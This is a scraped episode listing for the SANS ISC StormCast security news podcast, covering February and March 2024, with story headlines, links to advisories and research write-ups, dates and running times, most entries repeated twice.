What happens when you accidentially leak your AWS API Keys https://isc.sans.edu/diary/What%20happens%20when%20you%20accidentally%20leak%20your%20AWS%20API%20keys%3F%20%5BGuest%20Diary%5D/30730 How Crypto Imposters are using Calendly to infect Macs with Malware https://cyberguy.com/news/how-crypto-imposters-are-using-calendly-to-infect-macs-with-malware/ https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/ Misconfiguration Manager: Overlooked and Overprivileged https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d
3/12/20246 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, March 12th, 2024

What happens when you accidentially leak your AWS API Keys https://isc.sans.edu/diary/What%20happens%20when%20you%20accidentally%20leak%20your%20AWS%20API%20keys%3F%20%5BGuest%20Diary%5D/30730 How Crypto Imposters are using Calendly to infect Macs with Malware https://cyberguy.com/news/how-crypto-imposters-are-using-calendly-to-infect-macs-with-malware/ https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/ Misconfiguration Manager: Overlooked and Overprivileged https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d
3/12/20246 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, March 11th, 2024

Attack Wrangles Thousands of Web Users into a Password Cracking Botnet https://arstechnica.com/security/2024/03/attack-wrangles-thousands-of-web-users-into-a-password-cracking-botnet Cisco VPN Client Vuln https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-client-crlf-W43V4G7 Fortinet Vulnerability Exploited https://bishopfox.com/blog/cve-2024-21762-vulnerability-scanner-for-fortigate-firewalls pgAdmin Path Traversal https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/ Font Vulnerabilities https://www.canva.dev/blog/engineering/fonts-are-still-a-helvetica-of-a-problem/ QNAP Flaws https://securityonline.info/cve-2024-21899-cvss-9-8-critical-qnap-flaw-opens-door-to-hackers/
3/11/20247 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, March 11th, 2024

Attack Wrangles Thousands of Web Users into a Password Cracking Botnet https://arstechnica.com/security/2024/03/attack-wrangles-thousands-of-web-users-into-a-password-cracking-botnet Cisco VPN Client Vuln https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-client-crlf-W43V4G7 Fortinet Vulnerability Exploited https://bishopfox.com/blog/cve-2024-21762-vulnerability-scanner-for-fortigate-firewalls pgAdmin Path Traversal https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/ Font Vulnerabilities https://www.canva.dev/blog/engineering/fonts-are-still-a-helvetica-of-a-problem/ QNAP Flaws https://securityonline.info/cve-2024-21899-cvss-9-8-critical-qnap-flaw-opens-door-to-hackers/
3/11/20247 minutes, 17 seconds
Episode Artwork

ISC StormCast for Friday, March 8th, 2024

AWS Deploymnet Risks - Configuration and Credential File Targeting https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20AWS%20Deployment%20Risks%20-%20Configuration%20and%20Credential%20File%20Targeting/30722 Apple Updates https://isc.sans.edu/diary/MacOS%20Patches%20%28and%20Safari%2C%20TVOS%2C%20VisionOS%2C%20WatchOS%29/30726 NSA/CISA Secure Cloud Guides https://media.defense.gov/2024/Mar/07/2003407866/-1/-1/0/CSI-CloudTop10-Identity-Access-Management.PDF https://media.defense.gov/2024/Mar/07/2003407858/-1/-1/0/CSI-CloudTop10-Key-Management.PDF https://media.defense.gov/2024/Mar/07/2003407859/-1/-1/0/CSI-CloudTop10-Managed-Service-Providers.PDF https://media.defense.gov/2024/Mar/07/2003407862/-1/-1/0/CSI-CloudTop10-Secure-Data.PDF https://media.defense.gov/2024/Mar/07/2003407861/-1/-1/0/CSI-CloudTop10-Network-Segmentation.PDF
3/8/20245 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, March 8th, 2024

AWS Deploymnet Risks - Configuration and Credential File Targeting https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20AWS%20Deployment%20Risks%20-%20Configuration%20and%20Credential%20File%20Targeting/30722 Apple Updates https://isc.sans.edu/diary/MacOS%20Patches%20%28and%20Safari%2C%20TVOS%2C%20VisionOS%2C%20WatchOS%29/30726 NSA/CISA Secure Cloud Guides https://media.defense.gov/2024/Mar/07/2003407866/-1/-1/0/CSI-CloudTop10-Identity-Access-Management.PDF https://media.defense.gov/2024/Mar/07/2003407858/-1/-1/0/CSI-CloudTop10-Key-Management.PDF https://media.defense.gov/2024/Mar/07/2003407859/-1/-1/0/CSI-CloudTop10-Managed-Service-Providers.PDF https://media.defense.gov/2024/Mar/07/2003407862/-1/-1/0/CSI-CloudTop10-Secure-Data.PDF https://media.defense.gov/2024/Mar/07/2003407861/-1/-1/0/CSI-CloudTop10-Network-Segmentation.PDF
3/8/20245 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, March 7th, 2024

Scanning and Abusing the QUIC Protocol https://isc.sans.edu/diary/Scanning%20and%20abusing%20the%20QUIC%20protocol/30720 Google Chrome Update https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html Spinning YARN https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/ Teamcity Exploited https://twitter.com/leak_ix/status/1765460190621581347
3/7/20246 minutes, 6 seconds
Episode Artwork

ISC StormCast for Thursday, March 7th, 2024

Scanning and Abusing the QUIC Protocol https://isc.sans.edu/diary/Scanning%20and%20abusing%20the%20QUIC%20protocol/30720 Google Chrome Update https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop.html Spinning YARN https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/ Teamcity Exploited https://twitter.com/leak_ix/status/1765460190621581347
3/7/20246 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, March 6th, 2024

iOS/iPadOS Updates with Zero Day Fixes https://isc.sans.edu/diary/Apple%20Releases%20iOS%20iPadOS%20Updates%20with%20Zero%20Day%20Fixes./30716 Why Your Firewall Will Kill You https://isc.sans.edu/diary/Why+Your+Firewall+Will+Kill+You/30714/ QEMU Tunnel https://securelist.com/network-tunneling-with-qemu/111803/ VMware Vulnerabilities Patched https://www.vmware.com/security/advisories/VMSA-2024-0006.html
3/6/20246 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, March 6th, 2024

iOS/iPadOS Updates with Zero Day Fixes https://isc.sans.edu/diary/Apple%20Releases%20iOS%20iPadOS%20Updates%20with%20Zero%20Day%20Fixes./30716 Why Your Firewall Will Kill You https://isc.sans.edu/diary/Why+Your+Firewall+Will+Kill+You/30714/ QEMU Tunnel https://securelist.com/network-tunneling-with-qemu/111803/ VMware Vulnerabilities Patched https://www.vmware.com/security/advisories/VMSA-2024-0006.html
3/6/20246 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, March 5th, 2024

Capturing DShield Packets with a LAN Tap https://isc.sans.edu/diary/Capturing%20DShield%20Packets%20with%20a%20LAN%20Tap%20%5BGuest%20Diary%5D/30708 Additional Critical Security Issues Affecting Teamcity https://blog.jetbrains.com/teamcity/2024/03/additional-critical-security-issues-affecting-teamcity-on-premises-cve-2024-27198-and-cve-2024-27199-update-to-2023-11-4-now/ GitHub Push Protection Now On By Default https://github.blog/2024-02-29-keeping-secrets-out-of-public-repositories/ Android Updates https://source.android.com/docs/security/bulletin/2024-03-01 Linksys E-2000 Vulnerablity https://warp-desk-89d.notion.site/Linksys-E-2000-efcd532d8dcf4710a4af13fca131a5b8
3/5/20245 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, March 5th, 2024

Capturing DShield Packets with a LAN Tap https://isc.sans.edu/diary/Capturing%20DShield%20Packets%20with%20a%20LAN%20Tap%20%5BGuest%20Diary%5D/30708 Additional Critical Security Issues Affecting Teamcity https://blog.jetbrains.com/teamcity/2024/03/additional-critical-security-issues-affecting-teamcity-on-premises-cve-2024-27198-and-cve-2024-27199-update-to-2023-11-4-now/ GitHub Push Protection Now On By Default https://github.blog/2024-02-29-keeping-secrets-out-of-public-repositories/ Android Updates https://source.android.com/docs/security/bulletin/2024-03-01 Linksys E-2000 Vulnerablity https://warp-desk-89d.notion.site/Linksys-E-2000-efcd532d8dcf4710a4af13fca131a5b8
3/5/20245 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, March 4th, 2024

Scanning for Confluence CVE-2022-26134 https://isc.sans.edu/diary/Scanning%20for%20Confluence%20CVE-2022-26134/30704 Exploiting CSP Wildcards for Google Domains https://attackshipsonfi.re/p/exploiting-csp-wildcards-for-google Silver SAML: Golden SAML in the Cloud https://www.semperis.com/blog/meet-silver-saml/
3/4/20245 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, March 4th, 2024

Scanning for Confluence CVE-2022-26134 https://isc.sans.edu/diary/Scanning%20for%20Confluence%20CVE-2022-26134/30704 Exploiting CSP Wildcards for Google Domains https://attackshipsonfi.re/p/exploiting-csp-wildcards-for-google Silver SAML: Golden SAML in the Cloud https://www.semperis.com/blog/meet-silver-saml/
3/4/20245 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, March 1st, 2024

Dissecting DarkGate: Module Malware Delivery and Persistence as a Service https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Dissecting%20DarkGate%3A%20Modular%20Malware%20Delivery%20and%20Persistence%20as%20a%20Service./30700 Ivanti Incident Response Update https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b Github Flooded with Infected Repos https://apiiro.com/blog/malicious-code-campaign-github-repo-confusion-attack Security Flaws in NoName Doorbell Cameras https://www.consumerreports.org/home-garden/home-security-cameras/video-doorbells-sold-by-major-retailers-have-security-flaws-a2579288796/
3/1/20246 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, March 1st, 2024

Dissecting DarkGate: Module Malware Delivery and Persistence as a Service https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Dissecting%20DarkGate%3A%20Modular%20Malware%20Delivery%20and%20Persistence%20as%20a%20Service./30700 Ivanti Incident Response Update https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b Github Flooded with Infected Repos https://apiiro.com/blog/malicious-code-campaign-github-repo-confusion-attack Security Flaws in NoName Doorbell Cameras https://www.consumerreports.org/home-garden/home-security-cameras/video-doorbells-sold-by-major-retailers-have-security-flaws-a2579288796/
3/1/20246 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, February 29th, 2024

Exploit Attempts for Unknown Password Reset Vulnerability https://isc.sans.edu/diary/Exploit%20Attempts%20for%20Unknown%20Password%20Reset%20Vulnerability/30698 StopRansomware: Updated ALPHV Blackcat Advisory https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a GlobalBlock Service To Prevent Trademark abuse https://www.bleepingcomputer.com/news/technology/registrars-can-now-block-all-domains-that-resemble-brand-names/
2/29/20245 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, February 29th, 2024

Exploit Attempts for Unknown Password Reset Vulnerability https://isc.sans.edu/diary/Exploit%20Attempts%20for%20Unknown%20Password%20Reset%20Vulnerability/30698 StopRansomware: Updated ALPHV Blackcat Advisory https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a GlobalBlock Service To Prevent Trademark abuse https://www.bleepingcomputer.com/news/technology/registrars-can-now-block-all-domains-that-resemble-brand-names/
2/29/20245 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, February 28th, 2024

Take Downs and the Rest of Us: Do they matter? https://isc.sans.edu/diary/Take%20Downs%20and%20the%20Rest%20of%20Us%3A%20Do%20they%20matter%3F/30694 Joint Cybersecurity Advisory https://www.ic3.gov/Media/News/2024/240227.pdf SVR Cyber Actors Adapt Tactics for Initial Cloud Access https://www.ncsc.gov.uk/news/svr-cyber-actors-adapt-tactics-for-initial-cloud-access Data Scientists Targeted by Malicious Hugging Face ML Models with Silent Backdoor https://jfrog.com/blog/data-scientists-targeted-by-malicious-hugging-face-ml-models-with-silent-backdoor/
2/28/20246 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, February 28th, 2024

Take Downs and the Rest of Us: Do they matter? https://isc.sans.edu/diary/Take%20Downs%20and%20the%20Rest%20of%20Us%3A%20Do%20they%20matter%3F/30694 Joint Cybersecurity Advisory https://www.ic3.gov/Media/News/2024/240227.pdf SVR Cyber Actors Adapt Tactics for Initial Cloud Access https://www.ncsc.gov.uk/news/svr-cyber-actors-adapt-tactics-for-initial-cloud-access Data Scientists Targeted by Malicious Hugging Face ML Models with Silent Backdoor https://jfrog.com/blog/data-scientists-targeted-by-malicious-hugging-face-ml-models-with-silent-backdoor/
2/28/20246 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, February 27th, 2024

Utilizing the VirusTotal API to Query Files Uploaded to the DShield Honeypot https://isc.sans.edu/diary/Utilizing%20the%20VirusTotal%20API%20to%20Query%20Files%20Uploaded%20to%20DShield%20Honeypot%20%5BGuest%20Diary%5D/30688 New WiFi Authentication Vulnerabilities Discovered https://www.top10vpn.com/research/wifi-vulnerabilities/ Subdomain Takeover Spam https://labs.guard.io/subdomailing-thousands-of-hijacked-major-brand-subdomains-found-bombarding-users-with-millions-a5e5fb892935
2/27/20246 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, February 27th, 2024

Utilizing the VirusTotal API to Query Files Uploaded to the DShield Honeypot https://isc.sans.edu/diary/Utilizing%20the%20VirusTotal%20API%20to%20Query%20Files%20Uploaded%20to%20DShield%20Honeypot%20%5BGuest%20Diary%5D/30688 New WiFi Authentication Vulnerabilities Discovered https://www.top10vpn.com/research/wifi-vulnerabilities/ Subdomain Takeover Spam https://labs.guard.io/subdomailing-thousands-of-hijacked-major-brand-subdomains-found-bombarding-users-with-millions-a5e5fb892935
2/27/20246 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, February 26th, 2024

Update MGLNDD * Scans https://isc.sans.edu/forums/diary/Update%3A%20MGLNDD_*%20Scans/30686/ Simple Anti-Sandbox Technique: Where's the Mouse https://isc.sans.edu/diary/Simple%20Anti-Sandbox%20Technique%3A%20Where%27s%20The%20Mouse%3F/30684 Security Vulnerabilities in Apex Code Could Leak Salesforce Data https://www.varonis.com/blog/apex-code-vulnerabilities IBM Operation Decision Manager Exploit CVE-2024-22319 CVE-2024-22320 https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/ Linux Kernel TLS Vulnerability CVE-2024-26582 https://lore.kernel.org/linux-cve-announce/2024022139-spruce-prelude-c358@gregkh/
2/26/20245 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, February 26th, 2024

Update MGLNDD * Scans https://isc.sans.edu/forums/diary/Update%3A%20MGLNDD_*%20Scans/30686/ Simple Anti-Sandbox Technique: Where's the Mouse https://isc.sans.edu/diary/Simple%20Anti-Sandbox%20Technique%3A%20Where%27s%20The%20Mouse%3F/30684 Security Vulnerabilities in Apex Code Could Leak Salesforce Data https://www.varonis.com/blog/apex-code-vulnerabilities IBM Operation Decision Manager Exploit CVE-2024-22319 CVE-2024-22320 https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/ Linux Kernel TLS Vulnerability CVE-2024-26582 https://lore.kernel.org/linux-cve-announce/2024022139-spruce-prelude-c358@gregkh/
2/26/20245 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, February 23rd, 2024

Friend, Foe or Something In Between https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Friend%2C%20foe%20or%20something%20in%20between%3F%20The%20grey%20area%20of%20%27security%20research%27/30670 Large AT&T Wireless Network Outage https://isc.sans.edu/diary/Large%20AT%26T%20Wireless%20Network%20Outage%20%23att%20%23outage/30680 Connect Wise Screenconnect Userd by LockBit https://www.bleepingcomputer.com/news/security/screenconnect-servers-hacked-in-lockbit-ransomware-attacks/ SSH Snake Abused in the Wild https://github.com/MegaManSec/SSH-Snake
2/23/20245 minutes, 51 seconds
Episode Artwork

ISC StormCast for Friday, February 23rd, 2024

Friend, Foe or Something In Between https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Friend%2C%20foe%20or%20something%20in%20between%3F%20The%20grey%20area%20of%20%27security%20research%27/30670 Large AT&T Wireless Network Outage https://isc.sans.edu/diary/Large%20AT%26T%20Wireless%20Network%20Outage%20%23att%20%23outage/30680 Connect Wise Screenconnect Userd by LockBit https://www.bleepingcomputer.com/news/security/screenconnect-servers-hacked-in-lockbit-ransomware-attacks/ SSH Snake Abused in the Wild https://github.com/MegaManSec/SSH-Snake
2/23/20245 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, February 22nd, 2024

Phishing Pages Hosted on Archive.org https://isc.sans.edu/forums/diary/Phishing%20pages%20hosted%20on%20archive.org/30676/ ScreenConnect Authentication Bypass Exploit CVE-2024-1709 CVE-2024-1708) https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass iMessage with PQ3 https://security.apple.com/blog/imessage-pq3/
2/22/20246 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, February 22nd, 2024

Phishing Pages Hosted on Archive.org https://isc.sans.edu/forums/diary/Phishing%20pages%20hosted%20on%20archive.org/30676/ ScreenConnect Authentication Bypass Exploit CVE-2024-1709 CVE-2024-1708) https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass iMessage with PQ3 https://security.apple.com/blog/imessage-pq3/
2/22/20246 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, February 21st, 2024

Python InfoStealer Wtih Dynamic Sandbox Detection https://isc.sans.edu/diary/Python%20InfoStealer%20With%20Dynamic%20Sandbox%20Detection/30668 Connectwise Screenconnect Vulnerabilities https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 Remove VMWare Enhanced Authentication Plugin (EAP) VE-2024-22245 CVE-2024-22250 https://kb.vmware.com/s/article/96442 Voltage Noise to Manipulate Wireless Chargers https://arxiv.org/pdf/2402.11423.pdf
2/21/20246 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, February 21st, 2024

Old Mirai New Exploits https://isc.sans.edu/diary/Mirai-Mirai%20On%20The%20Wall...%20%5BGuest%20Diary%5D/30658 KeyTrap PoC Exploit https://github.com/knqyf263/CVE-2023-50387 Google Open Sources Magika File ID System https://opensource.googleblog.com/2024/02/magika-ai-powered-fast-and-efficient-file-type-identification.html Exploiting Unsynchronised Clocks https://attackshipsonfi.re/p/exploiting-unsynchonised-clocks
2/21/20245 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, February 20th, 2024

Old Mirai New Exploits https://isc.sans.edu/diary/Mirai-Mirai%20On%20The%20Wall...%20%5BGuest%20Diary%5D/30658 KeyTrap PoC Exploit https://github.com/knqyf263/CVE-2023-50387 Google Open Sources Magika File ID System https://opensource.googleblog.com/2024/02/magika-ai-powered-fast-and-efficient-file-type-identification.html Exploiting Unsynchronised Clocks https://attackshipsonfi.re/p/exploiting-unsynchonised-clocks
2/20/20245 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, February 20th, 2024

Old Mirai New Exploits https://isc.sans.edu/diary/Mirai-Mirai%20On%20The%20Wall...%20%5BGuest%20Diary%5D/30658 KeyTrap PoC Exploit https://github.com/knqyf263/CVE-2023-50387 Google Open Sources Magika File ID System https://opensource.googleblog.com/2024/02/magika-ai-powered-fast-and-efficient-file-type-identification.html Exploiting Unsynchronised Clocks https://attackshipsonfi.re/p/exploiting-unsynchonised-clocks
2/20/20245 minutes, 32 seconds
Episode Artwork

ISC StormCast for Monday, February 19th, 2024

SolarWinds Security Advisories https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-3_release_notes.htm Google Chrome Adds Private Network Checks https://chromestatus.com/feature/4869685172764672 Gold Factory iOS Trojan https://www.group-ib.com/blog/goldfactory-ios-trojan/
2/19/20247 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, February 19th, 2024

SolarWinds Security Advisories https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-3_release_notes.htm Google Chrome Adds Private Network Checks https://chromestatus.com/feature/4869685172764672 Gold Factory iOS Trojan https://www.group-ib.com/blog/goldfactory-ios-trojan/
2/19/20247 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, February 16th, 2024

USPS Anchors Snowballing Smishing Campaigns https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/ Linux Issuing CVEs http://www.kroah.com/log/blog/2024/02/13/linux-is-a-cna/ Analyzing Pulse Secure Firmware and Bypassing Integrity Checking https://eclypsium.com/blog/flatlined-analyzing-pulse-secure-firmware-and-bypassing-integrity-checking/ Jennifer Walker: Detecting Rogue Ethernet Switches Using Layer 1 Techniques https://www.sans.edu/cyber-research/detecting-rogue-ethernet-switches-using-layer-1-techniques/
2/16/202413 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, February 16th, 2024

USPS Anchors Snowballing Smishing Campaigns https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/ Linux Issuing CVEs http://www.kroah.com/log/blog/2024/02/13/linux-is-a-cna/ Analyzing Pulse Secure Firmware and Bypassing Integrity Checking https://eclypsium.com/blog/flatlined-analyzing-pulse-secure-firmware-and-bypassing-integrity-checking/ Jennifer Walker: Detecting Rogue Ethernet Switches Using Layer 1 Techniques https://www.sans.edu/cyber-research/detecting-rogue-ethernet-switches-using-layer-1-techniques/
2/16/202413 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, February 15th, 2024

Guest Diary: Learning by Doing An Interative Adventure in Troubleshooting https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Learning%20by%20doing%3A%20Iterative%20adventures%20in%20troubleshooting/30648 Snap Trap: The Hidden Dangers within Ubuntu's Package Suggestion System https://www.aquasec.com/blog/snap-trap-the-hidden-dangers-within-ubuntus-package-suggestion-system/ The Risks of the Monikerlink Bug in Microsoft Outlook https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html AMD Patches https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7009.html
2/15/20245 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, February 15th, 2024

Guest Diary: Learning by Doing An Interative Adventure in Troubleshooting https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Learning%20by%20doing%3A%20Iterative%20adventures%20in%20troubleshooting/30648 Snap Trap: The Hidden Dangers within Ubuntu's Package Suggestion System https://www.aquasec.com/blog/snap-trap-the-hidden-dangers-within-ubuntus-package-suggestion-system/ The Risks of the Monikerlink Bug in Microsoft Outlook https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html AMD Patches https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7009.html
2/15/20245 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, February 14th, 2024

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20February%202024%20Patch%20Tuesday/30646 DNSSEC DoS Vulnerability CVE-2023-50387 https://www.presseportal.de/pm/173495/5713546 Zoom Desktop Client Vuln https://www.zoom.com/en/trust/security-bulletin QNAP Vulnerablity https://www.qnap.com/de-de/security-advisory/qsa-23-57 https://unit42.paloaltonetworks.com/qnap-qts-firmware-cve-2023-50358/
2/14/20246 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, February 14th, 2024

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20February%202024%20Patch%20Tuesday/30646 DNSSEC DoS Vulnerability CVE-2023-50387 https://www.presseportal.de/pm/173495/5713546 Zoom Desktop Client Vuln https://www.zoom.com/en/trust/security-bulletin QNAP Vulnerablity https://www.qnap.com/de-de/security-advisory/qsa-23-57 https://unit42.paloaltonetworks.com/qnap-qts-firmware-cve-2023-50358/
2/14/20246 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, February 13th, 2024

Exploit Against Unnamed BYTEVALUE Router Vulnerablity Included in Mirai https://isc.sans.edu/diary/Exploit%20against%20Unnamed%20%22Bytevalue%22%20router%20vulnerability%20included%20in%20Mirai%20Bot/30642 Senior Executives Targeted in Ongoing Azure Account Takeover https://www.darkreading.com/cloud-security/senior-executives-targeted-ongoing-azure-account-takeover CISA Parners With OpenSSF To Secure Software Repositories https://www.cisa.gov/news-events/alerts/2024/02/08/cisa-partners-openssf-securing-software-repositories-working-group-release-principles-package PostgreSQL Vulnerability https://www.postgresql.org/support/security/CVE-2024-0985/ Microsoft Defender Bypass via Comma https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
2/13/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, February 13th, 2024

Exploit Against Unnamed BYTEVALUE Router Vulnerablity Included in Mirai https://isc.sans.edu/diary/Exploit%20against%20Unnamed%20%22Bytevalue%22%20router%20vulnerability%20included%20in%20Mirai%20Bot/30642 Senior Executives Targeted in Ongoing Azure Account Takeover https://www.darkreading.com/cloud-security/senior-executives-targeted-ongoing-azure-account-takeover CISA Parners With OpenSSF To Secure Software Repositories https://www.cisa.gov/news-events/alerts/2024/02/08/cisa-partners-openssf-securing-software-repositories-working-group-release-principles-package PostgreSQL Vulnerability https://www.postgresql.org/support/security/CVE-2024-0985/ Microsoft Defender Bypass via Comma https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
2/13/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, February 12th, 2024

MSIX With Heaviliy Obfuscated PowerShell Script https://isc.sans.edu/diary/MSIX%20With%20Heavily%20Obfuscated%20PowerShell%20Script/30636 Too Many Honeypots https://vulncheck.com/blog/too-many-honeypots ClamAV Command Injection Vulnerability CVE-2024-20328 https://amitschendel.github.io/vulnerabilites/CVE-2024-20328/ ExpressVPN DNS Leaks https://www.expressvpn.com/blog/windows-app-dns-requests/
2/12/20245 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, February 12th, 2024

MSIX With Heaviliy Obfuscated PowerShell Script https://isc.sans.edu/diary/MSIX%20With%20Heavily%20Obfuscated%20PowerShell%20Script/30636 Too Many Honeypots https://vulncheck.com/blog/too-many-honeypots ClamAV Command Injection Vulnerability CVE-2024-20328 https://amitschendel.github.io/vulnerabilites/CVE-2024-20328/ ExpressVPN DNS Leaks https://www.expressvpn.com/blog/windows-app-dns-requests/
2/12/20245 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, February 9th, 2024

A Python MP3 Player With Builtin Keylogger Capability https://isc.sans.edu/diary/A%20Python%20MP3%20Player%20with%20Builtin%20Keylogger%20Capability/30632 Fake LastPass App in Apple App Store https://blog.lastpass.com/2024/02/warning-fraudulent-app-impersonating-lastpass-currently-available-in-apple-app-store/ Ivanti XXE Vulnerability https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure FortiOS sslvpnd vulnerability https://www.fortiguard.com/psirt/FG-IR-24-015
2/9/20245 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, February 9th, 2024

A Python MP3 Player With Builtin Keylogger Capability https://isc.sans.edu/diary/A%20Python%20MP3%20Player%20with%20Builtin%20Keylogger%20Capability/30632 Fake LastPass App in Apple App Store https://blog.lastpass.com/2024/02/warning-fraudulent-app-impersonating-lastpass-currently-available-in-apple-app-store/ Ivanti XXE Vulnerability https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure FortiOS sslvpnd vulnerability https://www.fortiguard.com/psirt/FG-IR-24-015
2/9/20245 minutes, 46 seconds
Episode Artwork

ISC StormCast for Thursday, February 8th, 2024

Anybody knows what this URL is about? Maybe Balena API request? https://isc.sans.edu/forums/diary/Anybody%20knows%20that%20this%20URL%20is%20about%3F%20Maybe%20Balena%20API%20request%3F/30628/ Critical shim vulnerability and patch https://github.com/rhboot/shim/releases/tag/15.8 Volt Typhoon Lessons Learned https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques
2/8/20245 minutes, 29 seconds
Episode Artwork

ISC StormCast for Thursday, February 8th, 2024

Anybody knows what this URL is about? Maybe Balena API request? https://isc.sans.edu/forums/diary/Anybody%20knows%20that%20this%20URL%20is%20about%3F%20Maybe%20Balena%20API%20request%3F/30628/ Critical shim vulnerability and patch https://github.com/rhboot/shim/releases/tag/15.8 Volt Typhoon Lessons Learned https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques
2/8/20245 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, February 7th, 2024

